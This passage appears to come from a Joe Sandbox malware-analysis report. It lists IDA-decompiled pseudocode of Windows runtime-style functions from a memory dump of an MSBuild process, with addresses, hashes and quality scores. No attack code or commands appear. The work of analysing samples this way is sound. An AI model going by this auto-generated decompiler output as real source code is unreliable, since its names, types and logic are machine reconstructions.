                                            					E010D165E(__ebx, 0x10f8ae4, (__edx -  *0x10f8b04 >> 0x14) + (__edx -  *0x10f8b04 >> 0x14), __edi, __ecx, (__edx -  *0x10f8b04 >> 0x14) + (__edx -  *0x10f8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                            				}
                                            				E010CAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                            				if(E01027D50() == 0) {
                                            					_t16 = 0x7ffe0388;
                                            				} else {
                                            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				if( *_t16 != 0) {
                                            					_t16 = E010BFE3F(_t22, _t35, _v8, _v12);
                                            				}
                                            				return _t16;
                                            			}











                                            0x010d1074
                                            0x010d1080
                                            0x010d1082
                                            0x010d108a
                                            0x010d108f
                                            0x010d1093
                                            0x010d10ab
                                            0x010d10ab
                                            0x010d10c3
                                            0x010d10cf
                                            0x010d10e1
                                            0x010d10d1
                                            0x010d10da
                                            0x010d10da
                                            0x010d10e9
                                            0x010d10f5
                                            0x010d10f5
                                            0x010d10fe

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6b99e989888a786b3e4de7d72f910c624d7561e79c8bf909b9bb81deac3533a
                                            • Instruction ID: e231c7863a547ed4e8eb5faa2c3b029a8811fac9b6a3db18edaf083801eb8654
                                            • Opcode Fuzzy Hash: e6b99e989888a786b3e4de7d72f910c624d7561e79c8bf909b9bb81deac3533a
                                            • Instruction Fuzzy Hash: CB0147726047469FD751EF68C940B9A7BE5ABD4310F04CA29F9C583690EE70D841CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010BFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E0104FA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x267;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}
















                                            0x010bfe3f
                                            0x010bfe3f
                                            0x010bfe4e
                                            0x010bfe58
                                            0x010bfe5d
                                            0x010bfe5f
                                            0x010bfe6a
                                            0x010bfe72
                                            0x010bfe75
                                            0x010bfe78
                                            0x010bfe83
                                            0x010bfe95
                                            0x010bfe85
                                            0x010bfe8e
                                            0x010bfe8e
                                            0x010bfea0
                                            0x010bfea1
                                            0x010bfea3
                                            0x010bfea8
                                            0x010bfebd

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c6379823feb9f293ca6c33b148faf5c5b702344a9172a2bfbb7dc3d442ee2fa
                                            • Instruction ID: 16f1fc10f2c69ac636e02184879e8ffe96170a12768cdcdb438db1c2b1669d43
                                            • Opcode Fuzzy Hash: 6c6379823feb9f293ca6c33b148faf5c5b702344a9172a2bfbb7dc3d442ee2fa
                                            • Instruction Fuzzy Hash: BC018471A00219ABDB14DFA9D845FEEBBB8EF54700F004066F940EB281DA74D911C794
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E010BFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				short _v58;
                                            				char _v64;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_t24 = __ebx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t30 = __edx;
                                            				_t31 = __ecx;
                                            				E0104FA60( &_v64, 0, 0x30);
                                            				_v24 = _a4;
                                            				_v32 = _t31;
                                            				_v28 = _t30;
                                            				_v58 = 0x266;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0388;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                            				}
                                            				_push( &_v64);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}
















                                            0x010bfec0
                                            0x010bfec0
                                            0x010bfecf
                                            0x010bfed9
                                            0x010bfede
                                            0x010bfee0
                                            0x010bfeeb
                                            0x010bfef3
                                            0x010bfef6
                                            0x010bfef9
                                            0x010bff04
                                            0x010bff16
                                            0x010bff06
                                            0x010bff0f
                                            0x010bff0f
                                            0x010bff21
                                            0x010bff22
                                            0x010bff24
                                            0x010bff29
                                            0x010bff3e

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e121c1ba5c88664f228cdc854be3a11c02abdaee02ca290fd806e4b7c9c04f0
                                            • Instruction ID: 1cccb2dbb6e5933126ce1a2218011fc53e47c8f02873861e3717af3abaeb7fa4
                                            • Opcode Fuzzy Hash: 8e121c1ba5c88664f228cdc854be3a11c02abdaee02ca290fd806e4b7c9c04f0
                                            • Instruction Fuzzy Hash: F7018471A0021AABDB14DBA9D885FEFBBB8EF54700F404066F940EB280DA74DA11C7D4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E010D8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				signed int _v12;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				short _v66;
                                            				char _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed char* _t18;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v12 =  *0x10fd360 ^ _t32;
                                            				_t31 = _a8;
                                            				_t30 = _a12;
                                            				_v66 = 0x1c20;
                                            				_v40 = __ecx;
                                            				_v36 = __edx;
                                            				_v32 = _a4;
                                            				_v28 = _a8;
                                            				_v24 = _a12;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0386;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v72);
                                            				_push(0x14);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                            			}
















                                            0x010d8a62
                                            0x010d8a71
                                            0x010d8a79
                                            0x010d8a82
                                            0x010d8a85
                                            0x010d8a89
                                            0x010d8a8c
                                            0x010d8a8f
                                            0x010d8a92
                                            0x010d8a95
                                            0x010d8a9f
                                            0x010d8ab1
                                            0x010d8aa1
                                            0x010d8aaa
                                            0x010d8aaa
                                            0x010d8abc
                                            0x010d8abd
                                            0x010d8abf
                                            0x010d8ac4
                                            0x010d8ada

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3368a0092f2b04bb1e4dbe9ffce6c08ccf81431d2a7356bd5a0d74c275c0305f
                                            • Instruction ID: cb4306f2ee89416489911674623e8a393d0c59585ec36b374cd99da2a4321447
                                            • Opcode Fuzzy Hash: 3368a0092f2b04bb1e4dbe9ffce6c08ccf81431d2a7356bd5a0d74c275c0305f
                                            • Instruction Fuzzy Hash: BE012CB1A0021DAFDB00DFA9D9819EEBBB8EF58310F50406AFA44E7341D634A900CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E010D8ED6(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				short _v62;
                                            				char _v68;
                                            				signed char* _t29;
                                            				intOrPtr _t35;
                                            				intOrPtr _t41;
                                            				intOrPtr _t42;
                                            				signed int _t43;
                                            
                                            				_t40 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t43;
                                            				_v28 = __ecx;
                                            				_v62 = 0x1c2a;
                                            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                            				_v24 = __edx;
                                            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                            				if(E01027D50() == 0) {
                                            					_t29 = 0x7ffe0386;
                                            				} else {
                                            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v68);
                                            				_push(0x1c);
                                            				_push(0x20402);
                                            				_push( *_t29 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                            			}


















                                            0x010d8ed6
                                            0x010d8ee5
                                            0x010d8eed
                                            0x010d8ef0
                                            0x010d8efa
                                            0x010d8f03
                                            0x010d8f0c
                                            0x010d8f15
                                            0x010d8f24
                                            0x010d8f27
                                            0x010d8f31
                                            0x010d8f43
                                            0x010d8f33
                                            0x010d8f3c
                                            0x010d8f3c
                                            0x010d8f4e
                                            0x010d8f4f
                                            0x010d8f51
                                            0x010d8f56
                                            0x010d8f69

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e4cbd2111b64ae3d767e65282733cc2dcefb89eb82cb98e743525913c68752c
                                            • Instruction ID: b89f4661d70d54c684461694b1032b512c78d6f584c06297403431905a419118
                                            • Opcode Fuzzy Hash: 1e4cbd2111b64ae3d767e65282733cc2dcefb89eb82cb98e743525913c68752c
                                            • Instruction Fuzzy Hash: A7111E70A002199FDB04DFA9D441BAEBBF4FF08300F0482BAE558EB782E634D940CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100DB60(signed int __ecx) {
                                            				intOrPtr* _t9;
                                            				void* _t12;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            
                                            				_t9 = __ecx;
                                            				_t14 = 0;
                                            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                            					_t13 = 0xc000000d;
                                            				} else {
                                            					_t14 = E0100DB40();
                                            					if(_t14 == 0) {
                                            						_t13 = 0xc0000017;
                                            					} else {
                                            						_t13 = E0100E7B0(__ecx, _t12, _t14, 0xfff);
                                            						if(_t13 < 0) {
                                            							L0100E8B0(__ecx, _t14, 0xfff);
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                            							_t14 = 0;
                                            						} else {
                                            							_t13 = 0;
                                            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                            						}
                                            					}
                                            				}
                                            				 *_t9 = _t14;
                                            				return _t13;
                                            			}







                                            0x0100db64
                                            0x0100db66
                                            0x0100db6b
                                            0x0100dbaa
                                            0x0100db71
                                            0x0100db76
                                            0x0100db7a
                                            0x0100dba3
                                            0x0100db7c
                                            0x0100db87
                                            0x0100db8b
                                            0x01064fa1
                                            0x01064fb3
                                            0x01064fb8
                                            0x0100db91
                                            0x0100db96
                                            0x0100db98
                                            0x0100db98
                                            0x0100db8b
                                            0x0100db7a
                                            0x0100db9d
                                            0x0100dba2

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                            • Instruction ID: 57197f5b0ef00b9658327d33e8704540344eec1c81c4775da2011a6b0bd7e366
                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                            • Instruction Fuzzy Hash: 4CF06833241923DBF7336AD98894B5BB6959F91A60F150475F3859B6C4CA60880297F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0100B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                            				signed char* _t13;
                                            				intOrPtr _t22;
                                            				char _t23;
                                            
                                            				_t23 = __edx;
                                            				_t22 = __ecx;
                                            				if(E01027D50() != 0) {
                                            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                            				} else {
                                            					_t13 = 0x7ffe0384;
                                            				}
                                            				if( *_t13 != 0) {
                                            					_t13 =  *[fs:0x30];
                                            					if((_t13[0x240] & 0x00000004) == 0) {
                                            						goto L3;
                                            					}
                                            					if(E01027D50() == 0) {
                                            						_t13 = 0x7ffe0385;
                                            					} else {
                                            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                            					}
                                            					if(( *_t13 & 0x00000020) == 0) {
                                            						goto L3;
                                            					}
                                            					return E01087016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                            				} else {
                                            					L3:
                                            					return _t13;
                                            				}
                                            			}






                                            0x0100b1e8
                                            0x0100b1ea
                                            0x0100b1f3
                                            0x01064a17
                                            0x0100b1f9
                                            0x0100b1f9
                                            0x0100b1f9
                                            0x0100b201
                                            0x01064a21
                                            0x01064a2e
                                            0x00000000
                                            0x00000000
                                            0x01064a3b
                                            0x01064a4d
                                            0x01064a3d
                                            0x01064a46
                                            0x01064a46
                                            0x01064a55
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0100b20a
                                            0x0100b20a
                                            0x0100b20a
                                            0x0100b20a

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                            • Instruction ID: 84ebb8d54da129d72a61f403f0d166c8880615ae7f9593c30211a23b2e6387d5
                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                            • Instruction Fuzzy Hash: 70018136200680ABE323A75DC804FAE7BD9EF51754F4940A1FA94CB6B2D679D800C625
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E0109FE87(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v24;
                                            				intOrPtr _v28;
                                            				short _v54;
                                            				char _v60;
                                            				signed char* _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t34;
                                            				signed int _t35;
                                            
                                            				_v8 =  *0x10fd360 ^ _t35;
                                            				_v16 = __ecx;
                                            				_v54 = 0x1722;
                                            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                            				_v28 =  *((intOrPtr*)(__ecx + 4));
                                            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                            				if(E01027D50() == 0) {
                                            					_t21 = 0x7ffe0382;
                                            				} else {
                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                            				}
                                            				_push( &_v60);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t21 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                            			}
















                                            0x0109fe96
                                            0x0109fe9e
                                            0x0109fea1
                                            0x0109fead
                                            0x0109feb3
                                            0x0109feb9
                                            0x0109fec3
                                            0x0109fed5
                                            0x0109fec5
                                            0x0109fece
                                            0x0109fece
                                            0x0109fee0
                                            0x0109fee1
                                            0x0109fee3
                                            0x0109fee8
                                            0x0109fefb

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 244f1d9bb41d8c01415464804708ef92aae9f1d7ccecfa19cc935199449a5217
                                            • Instruction ID: 3007867adf181dcf4172ebeea457e0119ddd9d9b515e8304e380ca7392843ed1
                                            • Opcode Fuzzy Hash: 244f1d9bb41d8c01415464804708ef92aae9f1d7ccecfa19cc935199449a5217
                                            • Instruction Fuzzy Hash: FA016270A00209AFCB14DFA8D542AAEBBF4EF18704F5041A9A544DB382D635D901CB80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E010C131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t32;
                                            				_v20 = _a4;
                                            				_v12 = _a8;
                                            				_v24 = __ecx;
                                            				_v16 = __edx;
                                            				_v50 = 0x1021;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0380;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x20402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}















                                            0x010c131b
                                            0x010c132a
                                            0x010c1330
                                            0x010c1336
                                            0x010c133e
                                            0x010c1341
                                            0x010c1344
                                            0x010c134f
                                            0x010c1361
                                            0x010c1351
                                            0x010c135a
                                            0x010c135a
                                            0x010c136c
                                            0x010c136d
                                            0x010c136f
                                            0x010c1374
                                            0x010c1387

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 55ba7206dcd73bbd75b8aa32dc6ba2e86253d27f5471058ec0228cd5f5328c80
                                            • Instruction ID: 104573b5675f757458658a4cb31028ce1b0cbd8ca444b4d5750e8c0cf6ed3594
                                            • Opcode Fuzzy Hash: 55ba7206dcd73bbd75b8aa32dc6ba2e86253d27f5471058ec0228cd5f5328c80
                                            • Instruction Fuzzy Hash: A9013CB1A01209EFCB04EFA9D545AAEB7F4FF18700F408069F985EB381E634DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 48%
                                            			E010D8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				short _v50;
                                            				char _v56;
                                            				signed char* _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				signed int _t32;
                                            
                                            				_t29 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t32;
                                            				_v16 = __ecx;
                                            				_v50 = 0x1c2c;
                                            				_v24 = _a4;
                                            				_v20 = _a8;
                                            				_v12 = __edx;
                                            				if(E01027D50() == 0) {
                                            					_t18 = 0x7ffe0386;
                                            				} else {
                                            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v56);
                                            				_push(0x10);
                                            				_push(0x402);
                                            				_push( *_t18 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                            			}















                                            0x010d8f6a
                                            0x010d8f79
                                            0x010d8f81
                                            0x010d8f84
                                            0x010d8f8b
                                            0x010d8f91
                                            0x010d8f94
                                            0x010d8f9e
                                            0x010d8fb0
                                            0x010d8fa0
                                            0x010d8fa9
                                            0x010d8fa9
                                            0x010d8fbb
                                            0x010d8fbc
                                            0x010d8fbe
                                            0x010d8fc3
                                            0x010d8fd6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba699cd055264387887c47be15e4819981d7f02b80c3f3edc7165273ddf38515
                                            • Instruction ID: d55d6e920cd6abe68f260aeaccc9bcbcea5818af25ea6484bef58a4579485c20
                                            • Opcode Fuzzy Hash: ba699cd055264387887c47be15e4819981d7f02b80c3f3edc7165273ddf38515
                                            • Instruction Fuzzy Hash: 6C01497490020DAFDB00DFB8D545A9EB7F4EF18300F508069F945EB341D634DA00CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 46%
                                            			E010C1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				short _v46;
                                            				char _v52;
                                            				signed char* _t15;
                                            				intOrPtr _t21;
                                            				intOrPtr _t27;
                                            				intOrPtr _t28;
                                            				signed int _t29;
                                            
                                            				_t26 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t29;
                                            				_v12 = _a4;
                                            				_v20 = __ecx;
                                            				_v16 = __edx;
                                            				_v46 = 0x1024;
                                            				if(E01027D50() == 0) {
                                            					_t15 = 0x7ffe0380;
                                            				} else {
                                            					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            				}
                                            				_push( &_v52);
                                            				_push(0xc);
                                            				_push(0x20402);
                                            				_push( *_t15 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                            			}














                                            0x010c1608
                                            0x010c1617
                                            0x010c161d
                                            0x010c1625
                                            0x010c1628
                                            0x010c162b
                                            0x010c1636
                                            0x010c1648
                                            0x010c1638
                                            0x010c1641
                                            0x010c1641
                                            0x010c1653
                                            0x010c1654
                                            0x010c1656
                                            0x010c165b
                                            0x010c166e

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7512303026c236dff6d2b63b0047a2cb3a7bd5294d8fd79759ec0e1da4015444
                                            • Instruction ID: 3d110e1428bd590a60d4ef9efa0226b63f11de2c99babbdf42d0f201e77d657f
                                            • Opcode Fuzzy Hash: 7512303026c236dff6d2b63b0047a2cb3a7bd5294d8fd79759ec0e1da4015444
                                            • Instruction Fuzzy Hash: 7BF06DB1A00258EFDB14EFA8D445EAEBBF4EF18700F4440A9E945EB381EA34D900CB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0102C577(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0102C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xfe11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L10:
                                            						E010D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags == 0) {
                                            						goto L10;
                                            					}
                                            					goto L9;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}









                                            0x0102c577
                                            0x0102c57d
                                            0x0102c581
                                            0x0102c5b5
                                            0x0102c5b9
                                            0x0102c5ce
                                            0x0102c5ce
                                            0x0102c5ca
                                            0x00000000
                                            0x0102c5ca
                                            0x0102c5c4
                                            0x0102c5c8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102c5ad
                                            0x00000000
                                            0x0102c5af

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e47b35f4769a02947e1d65b67777c5cbcafa07210d1337e546192ba88ad8f470
                                            • Instruction ID: d1c7483b44465fa56819f9ecb88bf5822629934cf386a2ba95c499952982d4e6
                                            • Opcode Fuzzy Hash: e47b35f4769a02947e1d65b67777c5cbcafa07210d1337e546192ba88ad8f470
                                            • Instruction Fuzzy Hash: 80F09AB29157B09EF7B6872C8204B6A7FE8AB05678F5884A7E58687206C6A4DCC0C251
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 94%
                                            			E010C2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                            				void* __esi;
                                            				signed char _t3;
                                            				signed char _t7;
                                            				void* _t19;
                                            
                                            				_t17 = __ecx;
                                            				_t3 = E010BFD22(__ecx);
                                            				_t19 =  *0x10f849c - _t3; // 0x73dcf66d
                                            				if(_t19 == 0) {
                                            					__eflags = _t17 -  *0x10f8748; // 0x0
                                            					if(__eflags <= 0) {
                                            						E010C1C06();
                                            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                            						__eflags = _t3;
                                            						if(_t3 != 0) {
                                            							L5:
                                            							__eflags =  *0x10f8724 & 0x00000004;
                                            							if(( *0x10f8724 & 0x00000004) == 0) {
                                            								asm("int3");
                                            								return _t3;
                                            							}
                                            						} else {
                                            							_t3 =  *0x7ffe02d4 & 0x00000003;
                                            							__eflags = _t3 - 3;
                                            							if(_t3 == 3) {
                                            								goto L5;
                                            							}
                                            						}
                                            					}
                                            					return _t3;
                                            				} else {
                                            					_t7 =  *0x10f8724; // 0x0
